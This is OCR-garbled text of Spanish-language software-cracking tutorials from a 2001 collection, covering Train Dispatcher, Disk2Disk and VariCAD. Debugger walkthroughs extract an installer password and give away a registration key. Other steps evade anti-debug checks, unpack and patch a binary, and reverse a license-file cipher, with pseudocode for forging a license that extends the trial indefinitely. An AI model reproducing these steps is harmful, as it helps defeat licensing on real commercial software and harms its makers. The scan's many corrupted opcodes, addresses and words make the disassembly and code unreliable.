:00401275 8DBE1C020000 lea edi, dword ptr [esi+0000021C] 


* Possible StringData Ref from Data Obj ->"Registered to " 


:0040127B 6820214400 push 0044212C 

:00401280 8BCF mov ecx, edi 

:00401282 E817A10200 call 0042B39E 

:00401287 8D45EC lea eax, dword ptr [ebp-14] 
:0040128A B960A44500 mov ecx, 0045A460 

:0040128F 50 push eax 

:00401290 E862030000 call 004015F7 

:00401295 8B00 mov eaX, dword ptr [eax] 
:00401297 8D8D68FEFFEFEF lea ecx, dword ptr [ebp+FFFFFF68] 
:0040129D 51 push ecx 

:0040129E 50 push eax 

:0040129F C645FCO1 mov [ebp-04], 01 

:004012A3 E8E4000000 call 0040138C 

:004012A8 59 pop ecx 

:004012A9 885DFC mov byte ptr [ebp-04], bl 
:004012AC 59 pop ecx 

:004012AD 8D4DEC lea ecx, dword ptr [ebp-14] 
:004012B0 E8ACIFO200 call 0042B261 

:004012B5 8D8568FEFEFEFEF lea eax, dword ptr [ebp+FFFFFF68] 
:004012BB 8BCF mov ecx, edi 

:004012BD 50 push eax 

:004012BE E813A20200 call 0042B4D6 


* Possible StringData Ref from Data Obj ->"Using a copy not registered to " 
=>"you is illegal." 


:004012C3 6830214400 push 0044213C 


:004012C8 8D8E2C020000 lea ecx, dword ptr [esi+0000022C] 
:004012CE E8CBA00200 call 0042B39E 

:004012D3 53 push ebx 

:004012D4 8D8EA4010000 lea ecx, dword ptr [esi+000001A4] 
:004012DA E8A0970200 call 0042AA7F 


* Possible StringData Ref from Data Obj ->"0k" 


:004012DF 686C214400 push 0044216C 

:004012E4 8D8E30010000 lea ecx, dword ptr [esi+00000130] 
:004012EA E8D8960200 call 0042A9C7 

:004012EF EB66 jmp 00401357 


Salto a la ejecución normal del programa. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401273(C) 


:004012F1 A10CA54500 mov eaxX, dword ptr [0045A50C] 
:004012F6 8B1510A54500 mov edx, dword ptr [0045A510] 
:004012FC 8BC8 mov ecx, eax 
:004012FE OBCA or ecx, edx 
:00401300 7512 jne 00401314 


Que cosa más rara, he puesto en marcha la máquina del tiempo y, por más días que pasen, este salto no se llega a 
producir. Por lo tanto, el programa siempre nos indicará lo de los 30 días, sin que llegue a decir que el 
periodo de evaluación ha terminado, ni que llevamos tantos o cuantos días. 


* Possible StringData Ref from Data Obj ->"30 DAY EVALUATION" 


:00401302 6870214400 push 00442170 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401340 (U) 


:00401307 8D8E1C020000 lea ecx, dword ptr [esi+0000021C] 
:0040130D E88CA00200 call 0042B39E 
:00401312 EB43 jmp 00401357 


Salto a la ejecución normal del programa. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401300(C) 


:00401314 53 push ebx 

:00401315 8BF8 mov edi, eax 

:00401317 8955EC mov dword ptr [ebp-14], edx 
:0040131A E84F450100 call 0041586E 

:0040131F 59 pop ecx 

:00401320 2BC7 sub eax, edi 

:00401322 1B55EC sbb edx, dword ptr [ebp-14] 
:00401325 53 push ebx 

:00401326 6880510100 push 00015180 

:0040132B 53 push ebx 

:0040132C 52 push edx 

:0040132D E86E7C0100 call 00418FA0O 

:00401332 6A1E push 0000001E 

:00401334 59 pop ecx 


Bonita manera de poner en ECX los 30 días. ¿Será para despistar? 


:00401335 2BC8 sub ecx, eax 
:00401337 3BCB cmp ecx, ebx 


:00401339 7F07 


jg 00401342 


* Possible StringData Ref from Data Ob] ->"EVALUATION PERIOD EXPIRED" 


:0040133B 6884214400 


:00401340 


EBC5 


push 00442184 


Jjmp 00401307 


Este salto nos llevaría a la ejecución del programa sin limitación alguna, pero eso sí, con el letrerito destinado a 
sacarnos los colores ;0) 


* Referenced by a 


| :00401339(C) 


:00401342 


:00401343 8D861C020000 


* Possible StringData Ref from Data Obj ->"%Sd DAY 


:00401349 
:0040134E 
:0040134F 


51 


68A0214400 
50 
E834470200 


(U)nconditional or 


push ecx 


(C)onditional Jump at Address: 


lea eax, dword ptr [esi+0000021C] 


push 004421A0 
push eax 
Call 00 


EVA 


JUATION" 


Karpoff Spanish Tutor 2001 


Programa: Train Dispatcher v3.1B 

PROTECCION: Password. 

Objetivo: Buscar el password a un installshield. 

Descripcion: Programa de trenes 

Dificultad: Novato 

DOWNLOAD : http://www.signalcc.com/train3/td31b.exe 

Herramientas: Softice 

CRACKER: Pedrolas N*18 FECHA: 22/03/2001 
INTRODUCCION 


Hola de nuevo, amigos. 
Esta vez le ha tocado el turno a 


Train Dispatcher v3.1B 


Un programa para jugar a manejar lineas de tren. 


AL ATAKE 


Nada mas arrancar el programa nos encontramos con la tipica ventana de 
installshield en la que nos pide un password para poder continuar con la 
instalación, pues bien este es nuestro objetivo. Tambien hay que decir que si 
seguimos los pasos utilizados en este manual, tambien se podrá encontrar el 
password para el programa complementario del Train Dispatcher, esto es, el 
Track Builder for Train Dispatcher. 


Arrancamos, iniciamos el programa, y en la ventana del password colocamos un 
numero cualquier, el que nos de la gana. Abrimos el Softice con CTRL+D y 
ponemos 


bpx hmemcpy 


Seguido pulsamos F5 y le damos al Ok dentro del programa. Acto seguido salta el 
Softice y pulsamos las siguientes teclas. 


F11, 9 veces F12 y caemos en la siguiente linea: 

01F:00401E7A 68B0C74000 PUSH 0040C7B0 

Pulsamos 3 veces F10 y llegamos a la siguiente linea: 

015F:00401E83 FF1580E24000 CALL  [KERNEL32!lstrcmp] 

Aunque os parezca raro, hay que meterse dentro del Kernel32.dl1l para encontrar 
el password. Dicho esto pulsamos F8 para meternos en la call. Una vez dentro 


caemos en la sigueinte linea: 


015F:BFF"77288 53 PUSH  EBX 


Le damos 10 veces a F10 y llegamos a una nueva Call en este caso esta en la 
linea: 


015F:BFF"772AC E8S969FFFFF CALL  BFF71247 


le damos a F8 y entramos en la call, ya esta cerca el password, pero antes hay 
que entrar en una nueva call, en este caso esta en la linea: 


015F:BFF71265 E8EF930000 CALL BFF7A659 


Le damos a F8 y luego a F10 hasta llegar a la linea: 


015F:BFF7A75A 3BF8 CMP EDI, EAX 


Pulsamos d edi y zasss, sale un numero, en este caso es el 677141 


Lo metemos como password y el programa continua instalandose. 


Para terminar la instalacion se necesita una clave de registro, que no se como 
saltarla, pero podeis usar esta que es de la anterior version de este programa: 


4254-3779-7947 


Hasta otra, pedrolas 


Bilbao, a 22 de Marzo de 2001 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
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Programa: Disk2Disk v1.2 
PROTECCION: Serial. 
Objetivo: Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 
Descripcion: No tengo idea, luego lo miraré :) 
Dificultad: Aficionado 
DOWNLOAD: http://www.duncanamps.cony disk2disk/ 
Softl ce 3+, The Customiser, ProcDump, UPX, W32Dasm, Hex Editor, DzA Patcher o PrincessSandy 
Herramientas: (para crear loader si quieren), NotePad (ya verán para qué), DeDe y por último | ceDump 
(si que son muchas jeje, pero todas son útiles) 
CRACKER: Dek_O0in FECHA: 23/03/2001 
INTRODUCCION 


Hi!!, cuanto tiempo sin esciribir nada jejeje. Aki vuelvo con otro tuto, como era de esperar. Primero de todo gracias a WaR_SpY 
por proporcionarme el programa, que será una víctima muy pero muy interesante, nos divertiremos mucho, ya verán por qué ;) 


Como me dijo Gádix, una BUENA PROTECCION se merece un BUEN TUTORIAL jejeje. Haciéndole caso escribo esto. Hoy usaremos 
herramientas MUY útiles pero no muy comunes, como por ejemplo el programa llamado "The Customiser", que como dice su 
nombre "Customiza"” las ventanas para nosotros, permitiéndonos cambiar el título, habilitar botones, deshabilitarlos, esconder 
ventanas, esconder botones, mostrar ventanas ocultas, mandar clicks del mouse, cambiar las captions de los controles y mil cosas 
más. Este es uno de mis programas favoritos y lo utilizo muy a menudo :). Tambien usaremos el NotePad, el cual nos ayudará en 
una pequeña cosa, pero necesaria. La NUEVA herramienta es el DzA's Patcher. Este parcheador de archivos puede parchear 
archivos empakados con gran facilidad, con el método de crear una seccion o poner el parche en al ultima sección. Utiliza el 
conocido método de (por ejemplo): mov byte prt [00401234], 74 y luego J MP entrypoint_original_del programa. Muy buena tool, 
tnx DZA ;). En fin, aprenderemos bastante, vamos a la acción!. 


AL ATAKE 


Ejecutamos el programa y mmmm, qué pasa???, nos aparece el error de "Este programa ha efectuado una operación no 
admitida.....”, mmmm, pensemos. ...., que puede ser esto!?, yo digo... tengo el Softl CE cargado, puede que el programador 
haya implementado alguna proteccion anti-debugger y haya sido lo suficientemente inteligente como para no dar el mensaje 
de error?, pues SI jeje. Esto ha hecho. No hay problema, tenemos el |cedump, que nos esconderá el debugger, asi que no 
hay problema. Cargamos | cedump y ejcutamos el programa. Ahora sí!, ya en el SplashForm sale "Unregistered Shareware". 
Hmmm, eso no importa. Vemos que hay un menú "Register". Vamos a "Enter registration code" y tenemos 3 campos. 
Nombre, e-mail y key. El botón de "Aceptar" está deshabilitado. Esto me hace pensar que el botón se habilita cuando 
introducimos los datos correctos, por lo tanto si pudiéramos pulsar el botón cuando está deshabilitado, el programa creeria 
que nos registramos de verdad y nos mandaria a las felicitaciones :). 


Ahora toca el análisis del archivo. Con File |nsPEctor o Language 2000 analizamos le archivo y vemos que está empakado con 
UPX (el primer programa comercial que veo en mi vida que está empakado con UPX xD). Tendremos que desempakarlo, pero 
antes, para ver que pasa, adelantamos el reloj del la PC 1 año, y ejecutamos el programa. Nos salen unos errores como 
"Sorry, you have already evaluated the software......” y "Your security key has expired. Please register the software package." 
y luego la ventana principal se hace mágicamente invisible, por lo tanto no podremos trabajar ahi :P. Los messageboxes 
parecen fáciles de saltar, pero algo me dice que NO son MessageBoxaA, si quieres puedes probarlo pon BPX MESSAGEBOXA y 
carga el programa, el Softl CE no salta, por lo tanto, debemos atakar por algún otro lado. 


El ejecutable estaba empakado con UPX, pues bien, vamos a desempakarlo entonces. Abrimos ProcDump seleccionamos 


del ProcDump?, o el programador MALIGNO (xD) nos ha tendido una trampa?. J ejeje, pues es la 2nda ;). El inteligente 
programador ha hecho algo asi (delphi): 


if FindWindow('23DB5B80','ProcDump32 (C) 1998, 1999 G-RoM, Lorian £ Stone') <> O then 
(23DB580 es el class de la ventana del ProcDump, este class varia de ventana en ventana 
(como ya debes saber), para encontrar una ventana específica debes darle el class y el 
título, en este caso si no contaramos con el customiser deberias modificar la titlebar con 
un editor hexadecimal, lo que es muy fácil, solo buscas la string y la reemplazas por lo que 


quieras) 

Showmessage ('Encontrada!') //el programador no hace Showmessage jeje 
else //directamente cierra la ventana y el programa 
Showmessage('No encontrada!') 

end; 


Si encuentra la ventana, la cierra. Esto hizo con el ProcDump para que no nos desempake el archivo. PEEEEEERO contamos 
con The Customiser :) . Con éste podemos cambiar el título de la venana del ProcDump para que el Disk2Disk no la 
encuentre. Abrimos el The Customiser y seleccionamos la ventana del procdump, con la opción select: 


7 ProcDump32 (0) 1998, 1999 G = 17 xj 
Tak JPA | address [Size | Owner |] Unpack 


c:twindows!systemikemel32. dll FFEFB635 BFF?O0000 00075000  7E901411 . 
c:Mwindowsisystemimsgstv32.exe FFFFC199 00000000 00000000 FFEFB635 Rebuild PE 
co windows! systemimprexe.exe FFFFFCES5 00500000 00007000  FFFFC199 - | 
c:windows!systemimstask.exe FFEO4025 01000000 00010000 FFFFFCES PE Editor 

etarchivos de programatnorton system... FFEO?4F9 00400000 00007000  FFFFFCES | 
extarchivos de programatarchivos comu... FFEO9BD9 00400000 00013000  FFFFFCES Bhrama Server] 
cAmindowsisvstemidlmeserv.exe FFEOSE49 00400000 00011000  FFFFFCES ha! 


Module MID” [addess (Size | 


Dptions 


El The Customiser nos brinda todo tipo de información sobre la ventana, y en la lengueta "Text", nos permite cambiar el 
título. Vamos ahi, y cambiamos "ProcDump32 (C) 1998, 1999 G-RoM, Lorian €: Stone" por "ProcDump" por ejemplo. Podemos 
cambiarlos al que queramos. Lo hacemos y ahora lo intentamos desempakar. J ejeje, ya no se cierra y lo desempaka bien. 
Pero hay una pekeña molestia. No me gusta que el procdump me deje su sello en el exe de "Unpacked with ProcDump", asi 
que lo voy a desempakar con el mismo UPX. Abrimos una ventana de DOS y vamos al directorio de UPX. Ponemos: upx -d 

CA Tu_programalDisk2disk.exe (por ejemplo, antes recuerda SIEMPRE hacer un backup del empakado) y voilá lo desempako 
perfecto. La ventaja de hacerlo con el mismo UPX y NO con Procdump es que si lo haces con UPX te deja el exe 


desempakado EXACTAMENTE igual a como estaba antes, con todas las mismas secciones, etc. 


El programa chequea eso con VARIAS ventanas. Chequea si tenemos abierto el SMU inspector, el W32Dasm, tiene Anti- 
Frogsl CE, y algunas tools más, pero esto no es ningun problema, si queremos probar nuestro crack con el hex editor 
(guardando como crack.exe y probando a ver si funciona probando y probando hasta que funcione) y mientras tener abierto 
el W32dasm, solo cambiamos el título de la ventana del W32Dasm siguiendo los mismos pasos que antes. 


— DeStRoZaNDo A 


Ahora ha llegado el momento del Parche. Parchear el archivo para simular estar registrados. Arriba deciamos: "Vemos que 
hay un menú "Register". Vamos a "Enter registration code" y tenemos 3 campos. Nombre, e-mail y key. El botón de "Aceptar" 
está deshabilitado. Esto me hace pensar que el botón se habilita cuando introducimos los datos correctos, por lo tanto si 
pudiéramos pulsar el botón cuando está deshabilitado, el programa creeria que nos registramos de verdad y nos mandaria a 
las felicitaciones :)". 


Eso mismo, si PUDIERAMOS pulsarlo. Pero cómo?, si está deshabilitado?, pues fácil. Lo habilitamos :). Vamos al the 
customiser y en la opción "Enable" seleccionamos el boton y mágicamente éste se habilita :). Ahora llenamos los campos. Yo 
he puesto: 


Nombre: DeK_OiN 
E-Mail: dek_ointdhotmail.com 
Key: 123456 


Ahora pulsamos el botón de "Aceptar". Nos manda al mensaje de "Congratulations, your software has been registered 
succesfully". Efectivamente no chequea todo 2 veces. Si vamos al about veremos que dice: Registered to DeK_OiN. Cerramos 
el programa, lo abrimos de nuevo y en el SplashForm que sale al iniciar dice: Registered to DeK_OiN pero cuando el Form 
Principal se abre nos sale un error: "A security key error has ocurred. Please reinstall the pakage". Esto quiere decir que el 
programa chequea los datos al iniciarse. Tenemos un problemaaaaa, llegó la hora de usar DeDe!. 


Decompilamos el exe desempakado con DeDe. Vamos a Procedures y clickeamos en el Form, que parece el Principal, frMain. 


Los datos se podrian chequear en el evento FormCreate, miramos pero no vemos nada interesante. Asi que vamos a 
FormActivate y si bajamos un poco veremos esto: 


00497AB0 E823FEFDEFF call 004778D8 

00497AB5 8B45F8 mov eax, [ebp-$08] 
00497AB8 5A pop edx 

| 

00497AB9 E8AABCFFFF call 00493768 

00497ABE 83E07EF and eax, +$7EF 

00497AC1 83F804 cmp eax, +504 

00497AC4 0F87F9000000 jnbe 00497BC3 

00497ACA FF2485D17A4900 jmp dword ptr [$497AD1+eax*4] 
00497AD1 6É outsb 

00497AD2 7B49 jnp 00497B1D 

00497AD4 009F7B4900E5 add [edi+$E500497B], bl 
00497ADA 7A49 Jp 00497B25 

00497ADC 000B add [ebx], cl 

00497ADE 7B49 jnp 00497B29 

00497AE0 003E add [esil, bh 

00497AE2 7B49 jnp 00497B2D 

00497AE4 006A00 add [edx+$00], ch 
00497AE7 668B0DA47D4900 mov CX, word ptr [$497DA4] 
00497AEE B201 mov dl, $01 


* Possible String Reference to: 'A security key error has occurred. 
| Please reinstall the package' 


00497AF0O B8B07D4900 mov eax, $00497DB0O 


00497AF5 E846E4FBFF call 00455F40 


* Reference to TApplication instance 


00497AFA A148874A00 
00497AFF 8B00 


* Reference to: 


00497B01 E8SEG66FFBEF 
00497B06 E9D9000000 
00497BOB 33D2 


mov eax, dword ptr [$4A8748] 
mov eax, [eax] 


forms.TApplication.Terminate (TApplication); 


call 0044EAEC 
jmp 00497BE4 
xor edx, edx 


Ahi lo tenemos. El mensaje de error, y luego Application. Terminate, o sea que se cierra el programa. Vamos a W32Dasm a la 
dirección 497AFE (en W32Dasm se ve un poco más claro). Vemos esto: 


:00497AB8 5A pop edx 

:00497AB9 ESAABCFFFF call 00493768 

:00497ABE 83E07F and eax, 0000007F 

:00497AC1 83F804 cmp eax, 00000004 
//si hemos expirado nos 
manda al mensaje de 
expired (pero como estamos 

:00497AC4 0F87F9000000 ja 00497BC3 e PO 
remover los chequeos de 
los datos que se hacen al 
inicio del programa) 

:00497ACA FF2485D17A4900 jmp dword ptr [4*eax+00497AD1] //salta a los errores 

:00497AD1 6E7B4900 DWORD 00497B6E 

:00497AD5 9F7B4900 DWORD 00497B9F 

:00497AD9 E57A4900 DWORD 00497AE5 

:00497ADD 0B7B4900 DWORD 00497B0B 

:00497AE1 3E7B4900 DWORD 00497B3E 

:00497AE5 6A00 push 00000000 

:00497AE7 668B0DA47D4900 MOV CX, word ptr [00497DA4] 

:00497AEE B201 mov dl, 01 

* Possible StringData Ref from Code Obj ->"A security key error has occurred. " //errores 


->" Please reinstall the packag 


Karpoff Spanish Tutor 2001 
A VariCAD 7.3.0.4 


PROTECCION: Archivo llave, limite de tiempo y demas restricciones 
Objetivo: Alargar la evaluacion Indefinidamente. 
E . Programa de Cad, que pesa muy poco y no tiene nada que envidiar a 
Descripcion: 
AutoCAD :) 
Dificultad: Avanzado 
DOWNLOAD: http: //www.varicad.com 
] . SoftICE, FileMON, RegMON (No valen los W32DASM y similares por 
Herramientas: 22 aR y E A 
estar el código también comprimido y encriptado) 
CRACKER: OGRY FECHA: 22/03/2001 


INTRODUCCION 


Lo primero es presentarme. Soy un programador normalito, que se dedica a 

esas aburridas aplicaciones de gestión en una empresa como otra cualquiera. 
Aficionado a la astronomía y a la construcción de telescopios, necesitaba un 

buen CAD para plasmar mis ideas. Así encontré en www.varicad.com mi programa 


ideal. Versión trial por 30 días. Mmmh. Me registré, me lo bajé y me lo 
instalé. El programa era mucho mejor de lo que esperaba (ya había probado 
antes otros 5 que no me convencieron), y decidí usarlo para el diseño de mi 
nuevo telescopio. 

Lo primero que ví era que variando la fecha del sistema, el programa 
respondía con diferentes NAG's, que iban desde 'vaya a la web a registrarse 
para obtener una licencia de 30 días', hasta "Versión trial, el programa no 
guarda archivos', pasando por 'le quedan tantos días para agotar el periodo 

de prueba'. Mmmh. Una vez salvado un fichero, no se puede abrir a menos que 
la fecha del sistema sea superior a la fecha en que éste fué salvado. Y 
tampoco te deja salvarlo a menos que la fecha del sistema sea superior a 
aquella en que fué abierto. Mmmh. Si voy cambiando la fecha del sistema con 
cuidado, los 30 días de periodo de prueba se pueden transformar en ¡un 
montón de horas de trabajo real!. Bien, así que seguramente tendré tiempo 
para completar el complicado diseño del telescopio. 


Pero llegó la primavera del 2001 y apenas me quedaban 7 días para finalizar 
el periodo de vigencia. Había trabajado muy duro en el diseño y no quería 
perderlo. Probé a pedir una nueva licencia. ¡Con la nueva licencia no puedo 
abrir el fichero!. El programa avisa de que ha habido una violación de la 
seguridad y se cierra. Rayos, no me queda más remedio que saltarme la 


seguridad. 


AL ATAKE 


Lo primero fué investigar en sitios como éste. Los crackers son gente muy 
enrrollada y suelen dejar sus herramientas preferidas colgadas en la web 
para que cualquiera pueda bajarselas. Después de leer unos cuantos 
tutoriales como los de esta colección, conseguí instalar correctamente el 

Softl CE. Aprendí a manejarlo e hice algunas pruebas. Otras herramientas que 
me resultaron imprescindibles fueron el FileMON y el RegMON. Sin ellas 
tampoco hubiera podido conseguirlo. Desde aquí quiero agradecer y felicitar 
a sus autores y al cracker que facilitó la instalación de Softl CE. ¡GRACIAS! 


Unos BPX's 


Lo primero fué averiguar que hacía el programa con el varicad.Ick, el 

fichero de licencia que proporciona el proveedor del programa. FileMON 
reportaba que se abría cada vez que se iniciaba el programa, así que pusé un 
BPX CreteFileA en SICE y luego arranque el programa. Cada vez que Sl CE 
interrumpía, buscaba (con S O L FFFFFFF 'varicad.Ick') a ver si esa era la 

vez en que se abria el fichero. 35 F5's después, encontré la cadena. F12 y 
estaba en la rutina que lo había abierto. Tomé nota de la dirección, para 

que las próximas veces no tuviera que esperar tanto. Fuí siguiendo el código 
con F8's hasta que me encontré con una rutina muy interesante. En 65AC10, 
comenzaba el proceso de desencriptado del contenido del fichero. Yo me había 
dado cuenta de que en una opción del menú de la aplicación, aparecía el 
número de licencia y el nombre registrado en la WEB. Como ésta información 
sólo podría residir en el .Ick que te mandan, era claro que si aparecía en 
memoria en algún momento, era porque se acababa de ejecutar la rutina de 
desencriptación. y lo cierto era que después de 65AC10 aparecía el texto del 
nombre de licencia... al revés. Luego la clave estaba en esa rutina. La 
estudíe con detalle hasta entender lo que hacía. Reproduzco aquí mis propias 
notas: 


Unas notas 
La rutina principal de protección está en 65ACBO 


Desde allí se llama a la rutina de desencriptación del fichero de licencia, 
en 65AC10. Luego se determina el tipo de licencia 

(primer byte desencriptado) y se opera en consecuencia. Entre tanto, hay 
varias llamadas a rutinas 7*, que son accesorios de alto nivel (abrir, leer, 
cerrrar ficheros, reservar heaps de memoria, etc). 


El fichero de licencia que tengo tiene el tipo 03 (se mete por la opción 03 
de lo que parece una estructura tipo SELECT CASE). 


Rutina de lectura y desencriptación del fichero varicad.Ick 


Los 46h bytes del fichero .Ick aparecen en 9DF71C: 
(Para proteger mi seguridad, he borrado de aquí los bytes. Lo siento, pero 
no quiero problemas) 


Al llamar a 65AC10, El contenido del SP es: 


ESP-14:46 00 00 00 ; lo que había en EDI (numero de bytes a desencriptar) 
ESP-10:04 00 00 00 ; lo que había en ESI 

ESP-0C:08 00 00 00 ; lo que había en EBP 

ESP-08:00 00 00 00 ; lo que habia en EBX 

ESP-04:CC F4 9D 00 ; IO QUE HABÍA EN ECX 

ODF4A0: 

ESP+00:B6 AD 65 00 ; rutina a la que hay que volver ? 
ESP+04:1C F7 9D 00 ; puntero a la zona encriptada 

ESP+08:46 00 00 00 ; numero de bytes del fichero 

ESP+0C: DO F4 9D 00 ; puntero a la dirección de destino (b60df0) 
ESP+10:CC F4 9D 00 ; puntero 

ESP+14:84 FA 9D 00 ; puntero 

ESP+18:E8 EA 79 00 ; rutina a la que hay que volver ? 

Los registros contienen 


EAX=009DF71C ; INICIO DEL FICHERO ENCRI PTADO 
EBX=00000000 

ECX=009DF4CC 

EDX=009DF4DO 

ESI =00000004 

EDI =00000046 ; NUMERO DE BYTES DEL FICHERO 
EBP=00000008 

ESP=009DF4A0 ; Stack Pointer 

El P=0065AC10 ; PUNTO DE ENTRADA A LA RUTINA DE DESENCRIPTACION 
CS=0137 ; SEGMENTO DE CODIGO 

DS=013F ; SEGMENTO DE DATOS 

SS=013F 

ES=013F 

FS=3BF7 ; FLAGS 

GS=0000 

FLAGS ; odl szapc 


El número de ; del comentario del código indica la 'vuelta' del proceso: 


65AC10 PUSH ECX ;No sabemos que hay en ECX, pero se incrementa ESP a 9df49c 
MOV EAX, [ESP+0C] ; contiene el 46 del numero de bytes a desencriptar 

PUSH EBX ;EBX es cero, se incrementa de nuevo el ESP a 9df498 

PUSH EBP ¡;EBP tiene un 8, se incrementa de nuevo ESP a 9df494 

MOV EBP, [ESP+1C] ;se carga EBP con 9df4cc (que ya estaba) 

PUSH ESI ;había un 4 en ESI, se incrementa el ESP a 9df490 

PUSH EDI ;se lleva el 46 a sp, se incrementa el ESP a 9df48c 

MOV EDI, [ESP+18] ;se lleva a EDI el 9DF71C (inicio de la zona encriptada), 
¡que ya estaba en el SP 

MOV BL, [EAX+EDI -1] ;en EAX esta el numero de bytes a desencriptar, en EDI, 
la dirección base 

¡luego esto lo que hace es coger el último byte del fichero (1Ch) 

ADD EAX, -02 ;se resta 2 del número de bytes a desencriptar 

XOR BL, CC ;1Ch XOR CCh = DOh . Esta será la base para los contadores 
PUSH EAX ; guarda en el sp el número de bytes a desencriptar 

MOV BYTE PTR [ESP+17],00 ;se ponen a cero el primer byte de la direccion que 
estaba 

¡en ECX y que se cargo en el sp en la 12 linea 

MOV [ESP+1C], BL ;se carga bl (=0Dh) en el ultimo byte de la direccion de 
comienzo 

¿de la zona encriptada que se cargo en EDI, y que ya estaba en el sp 

MOV [EBP+00], EAX ;se lleva el 44 (46-2 bytes del fichero) a la posición 


9DF4CC 

CALL 7285FB ; rutina sin sentido? 

MOV ESI, [ESP+24] ;se lleva a ESI el 9DF4D0 que hay en ESP+0C 

MOV [ESI], EAX ;se lleva a [9Df4D0] el contenido de EAX (O0b60df0), 
¿resultado de la rutina anterior, la que no tenía sentido 

MOV ECX, [EBP+00] ;se lleva a ECX el 044h que es la cuenta de bytes a 
desencriptar 

ADD ESP, 04 ¡se hace un POP ficticio 

XOR EAX, EAX ¡se pone a cero EAX 

TEST ECX, ECX ;se comprueba que en ECX (la cuenta de bytes) no haya un O 
JBE 65AC64 ;si hay un cero, se empieza en 65ac64 

¿Comienza el bucle de desencriptado 

65ACAF TEST AL, 01 ;se comprueba que AL sea impar. Al principio vale O, por 
lo que es 

¡par y se salta a 65AC64 

¡ahora en AL hay un O1 

¡ahora en AL hay un 02 

¡ahora en AL hay un 03 

JZ 65AC64 ;si es par, ir a 65AC64, como 00 es par, salta 

¡ahora no salta, porque tiene 01 

5 ahora si salta, porque tiene 02 

7 ahora no salta, porque AL tiene 03 


non MOV CL, [ESP+18] ;;se lleva a CL el DO, resultado de 
¿xorear el último byte del fichero con CCh 

se lleva a CL el D1 que había en el contador de impares 
MOV DL, [EDI +EAX] ;; llevamos a DL el segundo byte del fichero 
i¡¡llevamos a DL el cuarto byte del fichero (E2) 

INC CL ;;incrementamos CL (el contador de impares) 

MOV [ESP+18], CL ;;llevamos CL a dónde estaba (en ESP+18 hay un contador de 
impares) 

XOR DL, CL ;;DL= 94 XOR D1=45h 

1¡¡ DL=E2 XOR D2=30h 

JMP 65AC6B ;;a la rutina de 'colocación' 


65AC64 MOV DL [EDI +EAX] ; llevar a DL el byte del fichero apuntado por EAX 
(1C) 

¡¡¡ahora FEh, el tercer byte del fichero 

par DEC BL ;decrementar BL (el contador que empezó siendo el último byte del 
¡fichero XOR CC = DO, ahora pasa a CF 

si ahora en BL hay CF, que pasa a CE 

XOR DL, BL ;DL=CC XOR CF=03h 

1 DL=FE XOR CE=30h 


65AC6b MOV ECX [ESI] ;en [ESI] esta la dirección de destino (B60DfO0) 
poner MOV [EAX+ECX], DL ;llevamos DL a la dirección de destino + EAX (el 
contador de bytes) 

MOV EDX, [ESI] ;ahora ponemos la dir de dest en EDX 

MOV CL, [EAX+EDX] ; para cargar en CL el byte que había en DL 

MOV DL, [ESP+13] ; llevamos a DL el contador de ESP+13, que se inicializó con 
00 

;; pero ahora tiene 03 (el byte generado en la anterior vuelta) 

ADD DL, CL ¡sumamos el contador con el byte producido 

¡ahora en DL hay 45+03=48h 

¡ahora en DL hay 48+30=78h 

i¡¡ahora en DL hay 78+30=A8h 


MOV ECX, [EBP+00] ; llevamos a ECX el número de bytes a desencriptar (44) 
;; sigue siendo 44 


INC EAX ¡antes 00, ahora O1 

¡antes 01, ahora 02 

CMP EAX, ECX ; ¿hemos llegado al final? 

MOV [ESP+13], DL ¡ahora ponemos DL (=03) en el 'contador' 
¡y ahora ponemos 48 en el contador (o es un CRC???) 

y ahora el 78, esto es un CRC, me juego la barba... 

¡y ahora el A8, ES UN CRC por suma de bytes enteros... 


JB 65ACAF ;si no hemos dado con el final, a por otro byte 


MOV EAX, [ESP+1C] ;si ya hemos llegado al final, 

MOV DL, [ESP+13] ;aqui (en el CRC) tiene que haber lo mismo que en en 
penúltimo byte 

¿del fichero 

CMP DL, [EAX+EDI -2] 

JZ OO065ACAA ;o moriras... 


MOV ECX, [EBP+00] 
MOV EDI, [ESI] 
MOV EDX, ECX 

SHR ECX, 02 

XOR EAX, EAX 
REPZ STOSD 

MOV ECX, EDX 
AND ECX, 03 

REPZ STOSB 
G5ACAA POP EDI 


Zona de 44h datos desencriptada 


BDODFO: 

(Si no he puesto la zona encriptada, aún menos voy a poner la 
desencriptada...) 

Las fechas que aparecen son: 


39757575 Fecha de fin de licencia (modificada para proteger mi seguridad) 
39656565 Fecha de inicio de licencia (modificada para proteger mi seguridad) 


Después de desencriptadas, las fechas son comparadas con las que aparecen en 
78CE98, y si no coinciden, casca. 


Lo curioso es que si las modificas en esa posición, y en BDODFO en el 

momento adecuado (justo después de que acabe de ejecutarse 65ac10), y pones 
A3757575 por ejemplo, te aparece un bonito NAG que te informa de que tienes 
4296 (o más) días para probar. 


Pero si a la siguiente ejecución, no coincide lo que se desencripta del 
fichero con lo que pusiste (que de alguna manera, recoge y guarda de la 
anterior ejecución), te vuelve a salir el NAG de 'buscate una licencia". 


Si apartir de la rutina inversa a la de desencriptación (ver psudocódigo) 
generas un fichero con la misma fecha que dejaste en 78CE98, a partir de ese 
momento, tienes (ya para siempre) 4296 días (o más) para 'probar' el 


programa. Espero que saquen otra versión antes de que se acabe el tiempo 
para probarlo ;-)))))))))) 


Pseudocódigo de la rutina inversa 


Esta rutina trata de generar un fichero de licencia. Trataremos de no tocar 
nada más que la fecha de finalización de la licencia de un fichero ya 
existente. 


Lo primero, leer el fichero ya existente y cambiar la fecha por otra un poco 
mayor (10 o 20 años mayor). 
la zona a encriptar tendrá 44h bytes 


CRC=suma de todos los bytes (despreciando reboses) 
ByTabla[ 44] = 

(oculto para proteger la seguridad) 

ByFichero[ 46] 

ByContador=0h 

ByContaPAR=DOh 

ByContaNON=DOH 

ByNuevo = 00h 

while ByContador== 

ByCRC=ByCRC+ByTabla[ ByContador] 

si ByContador es par 

ByContaPAR-- 

ByNuevo=ByTabla[ ByContador] XOR ByContaPAR 
si no es par 

ByContaNON-- 

ByNuevo=ByTabla[ ByContador] XOR ByContaNON 


ByContador++ 

ByFicherol ByContador]=ByNuevo 
wend 

ByFichero[ ByContador]=ByCRC 
ByFicherol ByContador+1]=1Ch 


Si se sigue TODO el procedimiento, se desprotege. Te deja el NAG, pero no es 
tan malo, despues de todo... 


